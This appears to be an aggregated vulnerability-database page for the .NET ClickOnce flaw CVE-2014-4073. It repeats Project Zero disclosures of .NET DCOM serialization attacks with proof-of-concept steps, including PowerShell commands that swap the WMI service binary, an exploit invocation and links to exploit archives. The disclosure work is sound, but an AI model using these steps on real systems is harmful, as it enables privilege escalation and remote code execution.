Microsoft .NET Framework ClickOnce CVE-2014-4073 Remote Privilege Escalation Vulnerability
2014-10-14T00:00:00
ID SMNTC-70313 Type symantec Reporter Symantec Security Response Modified 2014-10-14T00:00:00
Description
Description
Microsoft .NET Framework is prone to a remote privilege-escalation vulnerability. An attacker can exploit this issue to gain elevated privileges within the context of the application; this can result in the attacker gaining complete control of the affected system.
Technologies Affected
Avaya CallPilot 4.0
Avaya CallPilot 4.0.1
Avaya CallPilot 5.0
Avaya CallPilot 5.0.1
Avaya CallPilot 5.1.0
Avaya Communication Server 1000 Telephony Manager 3.0
Avaya Communication Server 1000 Telephony Manager 3.0.1
Avaya Communication Server 1000 Telephony Manager 4.0
Avaya Communication Server 1000 Telephony Manager 4.0.1
Avaya Conferencing Standard Edition 6.0
Avaya Conferencing Standard Edition 6.0 SP1
Avaya Conferencing Standard Edition 6.0.1
Avaya Meeting Exchange - Client Registration Server 5.0
Avaya Meeting Exchange - Client Registration Server 5.0.1
Avaya Meeting Exchange - Client Registration Server 5.2
Avaya Meeting Exchange - Client Registration Server 5.2.1
Avaya Meeting Exchange - Client Registration Server 6.0
Avaya Meeting Exchange - Client Registration Server 6.2
Avaya Meeting Exchange - Recording Server 5.0
Avaya Meeting Exchange - Recording Server 5.0.1
Avaya Meeting Exchange - Recording Server 5.2
Avaya Meeting Exchange - Recording Server 5.2.1
Avaya Meeting Exchange - Recording Server 6.0
Avaya Meeting Exchange - Recording Server 6.2
Avaya Meeting Exchange - Streaming Server 5.0
Avaya Meeting Exchange - Streaming Server 5.0.1
Avaya Meeting Exchange - Streaming Server 5.2
Avaya Meeting Exchange - Streaming Server 5.2.1
Avaya Meeting Exchange - Streaming Server 6.0
Avaya Meeting Exchange - Streaming Server 6.2
Avaya Meeting Exchange - Web Conferencing Server 5.0
Avaya Meeting Exchange - Web Conferencing Server 5.0.1
Avaya Meeting Exchange - Web Conferencing Server 5.2
Avaya Meeting Exchange - Web Conferencing Server 5.2.1
Avaya Meeting Exchange - Web Conferencing Server 6.0
Avaya Meeting Exchange - Web Conferencing Server 6.2
Avaya Meeting Exchange - Webportal 5.0
Avaya Meeting Exchange - Webportal 5.0.1
Avaya Meeting Exchange - Webportal 5.2
Avaya Meeting Exchange - Webportal 5.2.1
Avaya Meeting Exchange - Webportal 6.0
Avaya Meeting Exchange - Webportal 6.2
Avaya Messaging Application Server 5
Avaya Messaging Application Server 5.0
Avaya Messaging Application Server 5.0.1
Avaya Messaging Application Server 5.2
Avaya Messaging Application Server 5.2.1
Microsoft .NET Framework 2.0 SP2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.0
Microsoft .NET Framework 4.5
Microsoft .NET Framework 4.5.1
Microsoft .NET Framework 4.5.2
Recommendations
Block external access at the network boundary, unless external parties require service.
Filter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.
Updates are available. Please see the references or vendor advisory for more information.
{"cve": [{"lastseen": "2020-10-03T12:01:17", "description": "Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, 4.5, 4.5.1, and 4.5.2 processes unverified data during interaction with the ClickOnce installer, which allows remote attackers to gain privileges via vectors involving Internet Explorer, aka \".NET ClickOnce Elevation of Privilege Vulnerability.\"", "edition": 3, "cvss3": {}, "published": "2014-10-15T10:55:00", "title": "CVE-2014-4073", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4073"], "modified": "2018-10-12T22:06:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.0", "cpe:/a:microsoft:.net_framework:4.5.1", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.5", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:2.0", "cpe:/a:microsoft:.net_framework:4.5.2"], "id": "CVE-2014-4073", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4073", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRealtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation", "edition": 1, "published": "2017-04-25T00:00:00", "title": "Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073"], "modified": "2017-04-25T00:00:00", "id": "EXPLOITPACK:0591D13824805C54C94555FCAB81B9EE", "href": "", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075\n\nWindows: Dolby Audio X2 Service Elevation of Privilege\nPlatform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.\nClass: Elevation of Privilege\n\nSummary:\nThe DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.\n\nDescription:\n\nThe DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There\u2019s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.\n\nMicrosoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.\n\nProof of Concept:\n\nTo demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.\n\n1) From a command prompt run the command \u201cExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad\u201d \n2) Check the currently running processes for the privileged copy of notepad,\n\nExpected Result:\nNo privilege escalation occurs.\n\nObserved Result:\nAn instance of notepad is running at system privileges.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41933.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution", "edition": 1, "published": "2017-04-20T00:00:00", "title": "Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073"], "modified": "2017-04-20T00:00:00", "id": "EXPLOITPACK:7D4B2BDADA62BAA8E8BF6E13B9C4CE9F", "href": "", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1081\n\nWindows: ManagementObject Arbitrary .NET Serialization RCE\nPlatform: .NET 4.6, Powershell 4. Tested between Server 2016 and Windows 10 Anniversary Edition\nClass: Remote Code Execution\n\nSummary:\nAccessing a compromised WMI server over DCOM using System.Management classes or the Powershell Get-WmiObject Cmdlet can lead to the server running arbitrary code on the calling machine leading to RCE.\n\nDescription:\n\nThe dangers of using .NET for DCOM are well know, the SRD blog made a post (https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/) which explicitly said it shouldn\u2019t be used between trust boundaries. Presumably people took this to mean implementing servers, but it\u2019s also a risk if a .NET DCOM client connects to an untrusted endpoint. This is due to the IManagedObject interface which will automatically force a client to deserialize an untrusted BinaryFormatter stream which is known bad.\n\nOne common use of DCOM in the .NET framework is for WMI access. The old classes in the System.Management namespace are still accessible (even though technically supersceded by Cim classes) and in powershell they act as the backend for Get-WmiObject and family. Through inspection it\u2019s clear that a number of places the client querys for IManagedObject (for example on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin method) and would be vulnerable. If this interface is being queried it means that a .NET client is trying to create an RCW and will try and create a local copy of a remote serializable object.\n\nTherefore in corporate scenarios where some central system is using WMI over DCOM for management and analysis of running systems (and the management code is using the old .NET/PS classes to do the calls) a compromised machine which replaces the WMI service with its own malicious one could get arbitrary code execution on the monitoring machine. As this is typically going to be a higher privileged account (due to the requirements of DCOM access) it probably makes it more serious.\n\nLooking at the network traffic the initial CreateInstance call on the remote activator is only using CONNECT level authentication. This means that it might also be possible to MITM (or Man-At-The-Side) a .NET WMI client and send it back a malicious COM objref to get it to communicate with the attacker's server. \n\nOf course ideally no one would do this, or use the old style .NET and PS commands. But I\u2019m sure there are networks out there which do so.\n\nProof of Concept:\n\nI\u2019ve provided a PoC as a C# project. You\u2019ll need to also set up some machines to test this out. I\u2019ve tested it in a simple environment of a Server 2016 server acting as a DC and a Windows 10 client. The serialized stream is tailored specifically for 4.6, I don\u2019t know if it works anywhere else.\n\n1) Compile the C# project and copy the binary to c:\\service\\FakeWmiServer.exe on the Client machine.\n2) Run the following commands in admin Powershell on the client machine to configure the WMI service and add the server executable to the firewall.\n\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Inbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Outbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\nsc.exe config winmgmt binPath= c:\\service\\FakeWMIService.exe type= own\nRestart-Service winmgmt -Force\n\n3) On the server start powershell.\n4) On the server execute the PS command \u201cGet-WmiObject -Class Win32_Process -ComputerName hostname\u201d replacing hostname with the address of the client.\n\nExpected Result:\nWMI connection fails.\n\nObserved Result:\nA copy of CMD and Notepad is executed on the server in the context of the calling user.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41903.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows 10 - COM Desktop Broker Privilege Escalation", "edition": 1, "published": "2019-01-14T00:00:00", "title": "Microsoft Windows 10 - COM Desktop Broker Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073"], "modified": "2019-01-14T00:00:00", "id": "EXPLOITPACK:72919B3D352BE95E4523CEA502D5EAA0", "href": "", "sourceData": "Windows: COM Desktop Broker Elevation of Privilege\nPlatform: Windows 10 1809 (almost certainly earlier versions as well).\nClass: Elevation of Privilege\nSecurity Boundary (per Windows Security Service Criteria): AppContainer Sandbox\n\nSummary: \n\nThe COM Desktop Broker doesn\u2019t correctly check permissions resulting in elevation of privilege and sandbox escape.\n\nDescription:\nWindows 10 introduced \u201cBrokered Windows Runtime Components for side-loaded applications\u201d which allows a UWP application to interact with privileged components by allowing developers to write a custom broker in .NET. Rather than handling this with the existing Runtime Broker a new \u201cDesktop Broker\u201d was created and plumbed into the COM infrastructure. This required changes in COMBASE to instantiate the broker class and RPCSS to control access to the broker.\n\nThe stated purpose is only for use by sideloaded enterprise applications, specifically .NET based ones. Looking at the checks in RPCSS for the activation of the broker we can see the check as follows:\n\nHRESULT IsSideLoadedPackage(LPCWSTR *package_name, bool *is_sideloaded) {\n PackageOrigin origin;\n *is_sideloaded = false;\n HRESULT hr = GetStagedPackageOrigin(package_name, &origin);\n if (FAILED(hr))\n return hr;\n \n *is_sideloaded = origin != PackageOrigin_Store;\n return S_OK;\n}\n\nThis check is interesting because it considered anything to be sideloaded that hasn\u2019t come from the Store. Looking at the PackageOrigin enumeration this includes Inbox applications such as Cortana and Edge both of which process potentially untrusted content from the network. Of course this isn\u2019t an issue if the broker is secure, but\u2026\n\nFor a start, as long as RPCSS thinks the current package is side-loaded this feature doesn\u2019t require any further capability to use, or at least nothing checks for one during the process. Even in the side loading case this isn\u2019t ideal, it means that even though a side loaded application is in the sandbox this would allow the application to escape without giving the installer of the application any notice that it has effectively full trust. Contrast this with Desktop Bridge UWP applications which require the \u201cfullTrust\u201d capability to invoke a Win32 application outside the sandbox. This is even more important for a sandbox escape from an Inbox application as you can\u2019t change the capabilities at all without having privileged access. Now, technically you\u2019re supposed to have the appropriate configuration inside the application\u2019s manifest to use this, but that only applies if you\u2019re activating through standard COM Runtime activation routes, instead you can just create an instance of the broker\u2019s class (which is stored in the registry, but at least seems to always be C8FFC414-946D-4E61-A302-9B9713F84448). This class is running in a DLL surrogate at normal user privileges. Therefore any issue with this interface is a sandbox escape. The call implements a single interface, IWinRTDesktopBroker, which looks like:\n\nclass IWinRTDesktopBroker : public IUnknown {\n HRESULT GetClassActivatorForApplication(HSTRING dir, IWinRTClassActivator** ppv);\n};\n\nThis interface has only one method, GetClassActivatorForApplication which takes the path to the brokered components directory. No verification of this directory takes place, it can be anywhere you specify. I\u2019d have assumed it might have at least been limited to a special subdirectory of the package installation, but I\u2019d clearly be wrong. Passing an arbitrary directory to this method, you get back the following interface:\n\nclass IWinRTClassActivator : public IUnknown {\n HRESULT ActivateInstance(HSTRING activatableClassId, IInspectable** ppv);\n HRESULT GetActivationFactory(HSTRING activatableClassId, REFIID riid, IUnknown** ppv);\n};\n\nSo to escape the sandbox with this you can create directory somewhere, copy in a WinRT component winmd file then activate it. The activation process will run class constructors and give you arbitrary code execution outside the sandbox. \n\nHowever, even if the directory was checked in some way as long as you can get back the IWinRTClassActivator interface you could still escape the sandbox as the object is actually an instance of the System.Runtime.InteropServices.WindowsRuntime.WinRTClassActivator class which is implemented by the .NET BCL. This means that it exposes a managed DCOM object to a low-privileged caller which is pretty simple to exploit using my old serialization attacks (e.g. MSRC case 37122). The funny thing is MSRC wrote a blog post [1] about not using Managed DCOM across security boundaries almost certainly before this code was implemented but clearly it wasn\u2019t understood.\n[1] https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/\n\nThere are some caveats, as far as I can tell you can\u2019t create this broker from an LPAC Edge content process, more because the connection to the broker fails rather than any activation permissions check. Therefore to exploit from Edge you\u2019d need to get into the MicrosoftEdge process (or another process outside of LPAC). This is left as an exercise for the reader.\n\nFixing wise, I\u2019d guess unless you\u2019re actually using this for Inbox applications at a minimum you probably should only Developer and LOB origins. Ideally you\u2019d probably want to require a capability for its use but the horse may have bolted on that one. Anyway you might not consider this an issue as it can\u2019t easily be used from LPAC and side-loading is an issue unto itself.\n\nProof of Concept:\n\nI\u2019ve provided a PoC as a solution containing the C# PoC and Brokered Component as well as a DLL which can be injected into Edge to demonstrate the issue. The PoC will inject the DLL into a running MicrosoftEdge process and run the attack. Note that the PoC needs to know the relative location of the ntdll!LdrpKnownDllDirectoryHandle symbol for x64 in order to work. It should be set up for the initial release of RS5 (17763.1) but if you need to run it on another machine you\u2019ll need to modify GetHandleAddress in the PoC to check the version string from NTDLL and return the appropriate location (you can get the offset in WinDBG using \u2018? ntdll!LdrpKnownDllDirectoryHandle-ntdll). Also before you ask, the injection isn\u2019t a CIG bypass you need to be able to create an image section from an arbitrary file to perform the injection which you can do inside a process running with CIG.\n\n1) Compile the solution in \u201cRelease\u201d mode for \u201cAny CPU\u201d. It\u2019ll need to pull NtApiDotNet from NuGet to build.\n2) Start a copy of Edge.\n3) Execute the PoC from the x64\\Release directory.\n\nExpected Result:\nCreating the broker fails.\n\nObserved Result:\nThe broker creation succeeds and notepad executes outside the sandbox.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46162.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:59:51", "description": "Windows: ManagementObject Arbitrary .NET Serialization RCE\r\nPlatform: .NET 4.6, Powershell 4. Tested between Server 2016 and Windows 10 Anniversary Edition \r\nClass: Remote Code Execution\r\n\r\n#### Summary:\r\nAccessing a compromised WMI server over DCOM using System.Management classes or the Powershell Get-WmiObject Cmdlet can lead to the server running arbitrary code on the calling machine leading to RCE.\r\n\r\n#### Description:\r\n\r\nThe dangers of using .NET for DCOM are well know, the SRD blog made a post (https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/) which explicitly said it shouldn\u2019t be used between trust boundaries. Presumably people took this to mean implementing servers, but it\u2019s also a risk if a .NET DCOM client connects to an untrusted endpoint. This is due to the IManagedObject interface which will automatically force a client to deserialize an untrusted BinaryFormatter stream which is known bad.\r\n\r\nOne common use of DCOM in the .NET framework is for WMI access. The old classes in the System.Management namespace are still accessible (even though technically supersceded by Cim classes) and in powershell they act as the backend for Get-WmiObject and family. Through inspection it\u2019s clear that a number of places the client querys for IManagedObject (for example on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin method) and would be vulnerable. If this interface is being queried it means that a .NET client is trying to create an RCW and will try and create a local copy of a remote serializable object.\r\n\r\nTherefore in corporate scenarios where some central system is using WMI over DCOM for management and analysis of running systems (and the management code is using the old .NET/PS classes to do the calls) a compromised machine which replaces the WMI service with its own malicious one could get arbitrary code execution on the monitoring machine. As this is typically going to be a higher privileged account (due to the requirements of DCOM access) it probably makes it more serious.\r\n\r\nLooking at the network traffic the initial CreateInstance call on the remote activator is only using CONNECT level authentication. This means that it might also be possible to MITM (or Man-At-The-Side) a .NET WMI client and send it back a malicious COM objref to get it to communicate with the attacker's server. \r\n\r\nOf course ideally no one would do this, or use the old style .NET and PS commands. But I\u2019m sure there are networks out there which do so.\r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# project. You\u2019ll need to also set up some machines to test this out. I\u2019ve tested it in a simple environment of a Server 2016 server acting as a DC and a Windows 10 client. The serialized stream is tailored specifically for 4.6, I don\u2019t know if it works anywhere else.\r\n\r\n1) Compile the C# project and copy the binary to c:\\service\\FakeWmiServer.exe on the Client machine.\r\n2) Run the following commands in admin Powershell on the client machine to configure the WMI service and add the server executable to the firewall.\r\n\r\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Inbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\r\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Outbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\r\nsc.exe config winmgmt binPath= c:\\service\\FakeWMIService.exe type= own\r\nRestart-Service winmgmt -Force\r\n\r\n3) On the server start powershell.\r\n4) On the server execute the PS command \u201cGet-WmiObject -Class Win32_Process -ComputerName hostname\u201d replacing hostname with the address of the client.\r\n\r\nExpected Result: \r\nWMI connection fails.\r\n\r\nObserved Result: \r\nA copy of CMD and Notepad is executed on the server in the context of the calling user.", "published": "2017-04-19T00:00:00", "type": "seebug", "title": "Windows: ManagementObject Arbitrary .NET Serialization RCE\uff08CVE-2017-0160\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073", "CVE-2017-0160"], "modified": "2017-04-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92967", "id": "SSV:92967", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:57:55", "description": "Windows: Dolby Audio X2 Service Elevation of Privilege \r\nPlatform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016. \r\nClass: Elevation of Privilege \r\n\r\n#### Summary: \r\nThe DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.\r\n\r\n#### Description: \r\n\r\nThe DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There\u2019s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.\r\n\r\nMicrosoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.\r\n\r\nProof of Concept: \r\n\r\nTo demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.\r\n\r\n1) From a command prompt run the command \u201cExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad\u201d \r\n2) Check the currently running processes for the privileged copy of notepad,\r\n\r\nExpected Result: \r\nNo privilege escalation occurs.\r\n\r\nObserved Result:\r\nAn instance of notepad is running at system privileges.", "published": "2017-04-27T00:00:00", "type": "seebug", "title": "Windows: Dolby Audio X2 Service EoP (CVE-2017-7293)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073", "CVE-2017-7293"], "modified": "2017-04-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93058", "id": "SSV:93058", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-04-25T20:47:25", "description": "Windows 10 Realtek Audio Driver 6.0.1.7898 - Dolby Audio X2 Service Privilege Escalation. CVE-2017-7293. Local exploit for Windows platform", "published": "2017-04-25T00:00:00", "type": "exploitdb", "title": "Windows 10 Realtek Audio Driver 6.0.1.7898 - Dolby Audio X2 Service Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073", "CVE-2017-7293"], "modified": "2017-04-25T00:00:00", "id": "EDB-ID:41933", "href": "https://www.exploit-db.com/exploits/41933/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075\r\n\r\nWindows: Dolby Audio X2 Service Elevation of Privilege\r\nPlatform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nThe DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.\r\n\r\nDescription:\r\n\r\nThe DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There\u2019s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.\r\n\r\nMicrosoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.\r\n\r\nProof of Concept:\r\n\r\nTo demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.\r\n\r\n1) From a command prompt run the command \u201cExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad\u201d \r\n2) Check the currently running processes for the privileged copy of notepad,\r\n\r\nExpected Result:\r\nNo privilege escalation occurs.\r\n\r\nObserved Result:\r\nAn instance of notepad is running at system privileges.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41933.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41933/"}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:37", "bulletinFamily": "info", "cvelist": ["CVE-2014-0257", "CVE-2014-4073", "CVE-2017-7293"], "description": "Posted by James Forshaw, Project Zero\n\n** \n**\n\nOne of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they\u2019re difficult for a developer to mitigate outside of not using that technology, something which isn\u2019t always possible.\n\n** \n**\n\nI discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which make the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability. \n\n## A Little Bit of Background Knowledge\n\nIf you look at the history of .NET many of its early underpinnings was trying to make a better version of COM (for a quick history lesson it\u2019s worth watching [this short video](<https://channel9.msdn.com/blogs/thechannel9team/anders-hejlsberg-what-brought-about-the-birth-of-the-clr>) of Anders Hejlsberg discussing .NET). This led to Microsoft placing a large focus on ensuring that while .NET itself might not be COM it must be able to interoperate with COM. Therefore .NET can both be used to implement as well as consume COM objects. For example instead of calling QueryInterface on a COM object you can just cast an object to a COM compatible interface. Implementing an out-of-process COM server in C# is as simple as the following:\n\n** \n**\n\n// Define COM interface. \n[ComVisible(true)] \n[InterfaceType(ComInterfaceType.InterfaceIsIDispatch)] \n[Guid(\"3D2392CB-2273-4A76-9C5D-B2C8A3120257\")] \npublic interface ICustomInterface { \nvoid DoSomething(); \n} \n \n// Define COM class implementing interface. \n[ComVisible(true)] \n[Guid(\"8BC3F05E-D86B-11D0-A075-00C04FB68820\")] \npublic class COMObject : ICustomInterface { \npublic void DoSomething() {} \n} \n \n// Register COM class with COM services. \nRegistrationServices reg = new RegistrationServices(); \nint cookie = reg.RegisterTypeForComClients( \ntypeof(COMObject), \nRegistrationClassContext.LocalServer \n| RegistrationClassContext.RemoteServer, \nRegistrationConnectionType.MultipleUse);\n\n** \n**\n\nA client can now connect to the COM server using it\u2019s CLSID (defined by the Guid attribute on COMClass). This is in fact so simple to do that a large number of core classes in .NET are marked as COM visible and registered for use by any COM client even those not written in .NET.\n\n** \n**\n\n\n\n** \n**\n\nTo make this all work the .NET runtime hides a large amount of boilerplate from the developer. There are a couple of mechanisms to influence this boilerplate interoperability code, such as the InterfaceType attribute which defines whether the COM interface is derived from IUnknown or IDispatch but for the most part you get what you\u2019re given. \n\n** \n**\n\nOne thing developers perhaps don\u2019t realize is that it\u2019s not just the interfaces you specify which get exported from the .NET COM object but the runtime adds a number of \u201cmanagement\u201d interfaces as well. This interfaces are implemented by wrapping the .NET object inside a [COM Callable Wrapper](<https://msdn.microsoft.com/en-us/library/f07c8z1c\\(v=vs.110\\).aspx>) (CCW).\n\n** \n**\n\n\n\nWe can enumerate what interfaces are exposed by the CCW. Taking System.Object as an example the following table shows what interfaces are supported along with how each interface is implemented, either dynamically at runtime or statically implemented inside the runtime.\n\n** \n**\n\nInterface Name\n\n| \n\nImplementation Type \n \n---|--- \n \n_Object\n\n| \n\nDynamic \n \nIConnectionPointContainer\n\n| \n\nStatic \n \nIDispatch\n\n| \n\nDynamic \n \nIManagedObject\n\n| \n\nStatic \n \nIMarshal\n\n| \n\nStatic \n \nIProvideClassInfo\n\n| \n\nStatic \n \nISupportErrorInfo\n\n| \n\nStatic \n \nIUnknown\n\n| \n\nDynamic \n \n** \n**\n\nThe _Object interface refers to the COM visible representation of the System.Object class which is the root of all .NET objects, it must be generated dynamically as it\u2019s dependent on the .NET object being exposed. On the other hand IManagedObject is implemented by the runtime itself and the implementation is shared across all CCWs.\n\n** \n**\n\nI started looking at the exposed COM attack surface for .NET back in 2013 when I was investigating Internet Explorer sandbox escapes. One of the COM objects you could access outside the sandbox was the .NET [ClickOnce Deployment](<https://msdn.microsoft.com/en-us/library/t71a733d\\(v=vs.80\\).aspx>) broker (DFSVC) which turned out to be implemented in .NET, which is probably not too surprising. I actually found two issues, not in DFSVC itself but instead in the _Object interface exposed by all .NET COM objects. The _Object interface looks like the following (in C++).\n\n** \n**\n\nstruct _Object : public IDispatch { \nHRESULT ToString(BSTR * pRetVal); \nHRESULT Equals(VARIANT obj, VARIANT_BOOL *pRetVal); \nHRESULT GetHashCode(long *pRetVal); \nHRESULT GetType(_Type** pRetVal); \n};\n\n** \n**\n\nThe first bug (which resulted in [CVE-2014-0257](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0257>)) was in the GetType method. This method returns a COM object which can be used to access the [.NET reflection APIs](<https://msdn.microsoft.com/en-us/library/f7ykdhsy\\(v=vs.110\\).aspx>). As the returned _Type COM object was running inside the server you could call a chain of methods which resulted in getting access to the 